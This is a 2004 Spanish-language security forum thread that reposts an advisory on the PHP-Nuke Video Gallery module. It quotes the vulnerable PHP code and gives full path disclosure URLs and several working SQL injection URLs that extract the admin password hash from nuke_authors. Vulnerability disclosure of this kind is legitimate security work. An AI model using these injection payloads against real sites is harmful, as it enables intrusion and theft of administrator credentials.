elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Java [Guía] Patrones de diseño - Parte 1


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Multiple vulnerabilities PHP-Nuke - Video Gallery Module for PHP-Nuke
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Multiple vulnerabilities PHP-Nuke - Video Gallery Module for PHP-Nuke  (Leído 1,277 veces)
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 19.347


La libertad no se suplica, se conquista


Ver Perfil WWW
Multiple vulnerabilities PHP-Nuke - Video Gallery Module for PHP-Nuke
« en: 27 Abril 2004, 09:01 »

Recién sacado del horno (26/04/2004).

Gracias a DarkBicho por la información

===========================================================================
=================== Multiple vulnerabilities PHP-Nuke =====================
=================== Video Gallery Module for PHP-Nuke =====================

 PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke
 HOMEPAGE: http://videogallery.engorile.com/
 VERSION: 0.1 Beta 5
 BUG: Multiple vulnerabilities
 DATE:  26/04/2004
 AUTHOR: DarkBicho
    web: http://www.darkbicho.tk
    team: Security Wari Proyects <www.swp-zone.org>
     Email: darkbicho@peru.com

===========================================================================
===========================================================================


 Vulnerabilities:
 ---------------

1.- CODE:
    ¨¨¨¨
================================ CODE ===================================
function render_detail_clip($clipid, $catid){
   global $prefix, $dbi, $module_name;
   $tipomime="application/unknown";
   $next=next_clips($clipid, $catid);
   $result=sql_query("select descripcion, url_thumb, url_preview, accesos from ".$prefix."_videos_clips where clipid=$clipid", $dbi);
   list($descripcion, $url_thumb, $url_preview, $accesos)=sql_fetch_row($result, $dbi);
   $resultado=AbreTabla();
   if ($next["previous"]){
      $resultado.="<a href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&catid=$catid>"._PREVIOUS."</a>";
   }
   $resultado.="</td><td align=right>";
   if ($next["next"]){
      $resultado.="<a href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&catid=$catid>"._NEXT."</a>";
   }
   $resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>";
   if ($url_preview != ""){
      $tipomime=tipomime($clipid, "clips");
      $result2=sql_query("select class_id, options_object, options_embed from ".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);
      list($class_id, $options_object, $options_embed)=sql_fetch_row($result2, $dbi);
      $resultado.="<center>".mete_video($url_preview, $tipomime, 160, 120)."</center>";

   }
   else{
      $resultado.="<center><img src=\"$url_thumb\"></center>";
   }
   $resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);
   if (count_total($clipid, "clip", "ficheros") > 0){
      $resultado.=CierraTabla().AbreTabla().clip_files($clipid, $catid).CierraTabla();
   }
   else{
      $resultado.=CierraTabla();
   }
   $accesos++;
   sql_query("update ".$prefix."_videos_clips set accesos=$accesos where clipid=$clipid", $dbi);
   return "$resultado";
}

=========================================================================

2.- Full path disclosure:
    ¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨
   
    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive information.

    A) http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho

       Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in                                     /home/hosting/php-nuke/includes/sql_layer.php on line 286

    B) http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1

       Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in                                      /home/hosting/php-nuke/includes/sql_layer.php on line 286



3.- Sql injection:
    ¨¨¨¨¨¨¨¨¨¨¨¨¨¨
    This sql injection exploit can pull out from database any information, for example
    superadmin's username and password's md5 hash:


    A) http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1

    B)
http://localhost/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

    c)
http://localhost/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1
 
    D)
http://localhost/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1


 SOLUTION:
 ¨¨¨¨¨¨¨¨
    Vendors were contacted many weeks hago and plan to release a fixed version soon.
    Check the Video Gallery website for updates and official release details.



Aquí dejo otros Advisory de DarkBicho  ;)

http://www.securitytracker.com/alerts/2004/Apr/1009920.html
http://www.securitytracker.com/alerts/2004/Apr/1009930.html
http://seclists.org/lists/fulldisclosure/2004/Apr/0858.html
http://secunia.com/advisories/11475/
http://secunia.com/advisories/11474/
En línea

Since 2001, still kicking hard
oRTNZ


Desconectado Desconectado

Mensajes: 808


no no soy malo... soy vicioso :p


Ver Perfil
Re: Multiple vulnerabilities PHP-Nuke - Video Gallery Module for PHP-Nuke
« Respuesta #1 en: 28 Abril 2004, 03:42 »

Bien man ,como siempre poniendole sabor al foro  :P, haber si la pruebo xD
En línea

(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
php-nuke i gcalendar 1.7.1
PHP
pajaras 6 2,904 Último mensaje 13 Febrero 2011, 21:31
por pajaras
php-nuke nuke league 2.4
Desarrollo Web
pajaras 1 1,547 Último mensaje 15 Febrero 2011, 00:07
por pajaras
sistema de encuestas con php-nuke
Desarrollo Web
mxsoun 1 755 Último mensaje 21 Junio 2012, 03:22
por Graphixx
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines